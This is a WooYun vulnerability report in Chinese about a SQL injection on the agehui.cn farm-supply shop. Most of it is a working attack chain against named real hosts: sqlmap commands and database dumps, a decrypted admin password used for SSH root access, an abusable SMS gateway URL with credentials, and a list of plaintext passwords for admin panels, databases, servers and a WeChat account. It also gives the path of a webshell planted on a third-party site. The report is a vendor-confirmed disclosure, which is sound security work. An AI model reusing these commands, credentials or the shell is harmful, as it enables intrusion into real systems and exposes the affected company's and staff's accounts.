漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0151638
漏洞标题:阿哥汇官网一个SQL注射漏洞引发的一连串问题
相关厂商:北京士惠农业发展有限公司
漏洞作者: system-admin
提交时间:2015-11-10 10:26
修复时间:2015-12-26 09:58
公开时间:2015-12-26 09:58
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-11-10: 细节已通知厂商并且等待厂商处理中
2015-11-11: 厂商已经确认,细节仅向厂商公开
2015-11-21: 细节向核心白帽子及相关领域专家公开
2015-12-01: 细节向普通白帽子公开
2015-12-11: 细节向实习白帽子公开
2015-12-26: 细节向公众公开
简要描述:
互联网农资有点热。阿哥汇,一家服务农户的电子商城,官网www.agehui.com和www.agehui.cn均指向101.200.0.35,之前www.agehui.cn是指向103.41.54.112,这个IP打开后的首页现在仍是阿哥汇。阿哥汇属于北京士惠农业发展有限公司。此SQL注射漏洞首先导致官网101.200.0.35数据库沦陷后台被登录。用成功登录后台的账户可以访问该用户的邮箱,领导邮箱里存了不少密码,包括智联招聘账号、微信公共平台账号、奥瑞金公司官网账号等等。用该账户成功登录103.41.54.112的ssh远程。103.42.54.112虽然废弃不用了但并没清空网站文件,可以看到二次开发后的ecshop代码和短信验证码平台账号。士惠农业发展有限公司www.agrite.com.cn dede程序存漏洞请自查。
详细说明:
python sqlmap.py -u "http://business.agehui.cn/find/seed/index?type_id=1*" --dbs
available databases [10]:
[*] agehui_db
[*] agridb
[*] aksexpert
[*] es_2117
[*] es_new
[*] experts
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
python sqlmap.py -u "http://business.agehui.cn/find/seed/index?type_id=1*" --current-db
current database: 'agehui_db'
python sqlmap.py -u "http://business.agehui.cn/find/seed/index?type_id=1*" -D agehui_db --tables
230个表。
ecshop系统,直接找ecs_admin_user
经解密dingwen 密码flying00 邮箱zhangdingwen@agrite.com.cn,请自行更改吧
成功登陆101.200.0.35后台
ssh -l dingwen 103.41.54.112 密码同上 成功登陆 root权限
可以看到二次开发后的网站文件仍在,根目录下还有es.sql index.php_old这些小毛病
通过/home/www/shop的user.php可以看到短信验证码平台接口账户密码OperID=shfz&OperPass=shfz33,经验证是正确可用的
测试短信接口http://221.179.180.158:9007/QxtSms/QxtFirewall?OperID=shfz&OperPass=shfz33&SendTime=&ValidTime=&AppendID=&DesMobile=你的手机号&Content=wooyun&ContentType=15成功收到短信息,可群发单发
zhangdingwen@agrite.com.cn登录
邮箱里面有不少信息
其中奥瑞金官网密码经验证可用
http://www.originseed.com.cn/webadmin/
管理员zdw 密码shihui@origin
数据库账号密码:root/ cjchnws.1
服务器:root/zgyfjch@2013
留给wooyun一个shell地址以便验证:http://www.originseed.com.cn/template/product/miniUpload.php
而且这个网站https://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/file可遍历,可见里面有个php webshell
智联招聘
阿哥汇专家系统
http://business.agehui.com/admin/login
这个忘了记录了,是有这个密码的(不想再翻一遍邮件了)
微信公共平台
用户agehui@agrite.com.cn
密码shny@agehui
漏洞证明:
见详细说明,有图有真相
修复方案:
版权声明:转载请注明来源 system-admin@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:18
确认时间:2015-11-11 09:57
厂商回复:
谢谢白帽子的共享精神
最新状态:
暂无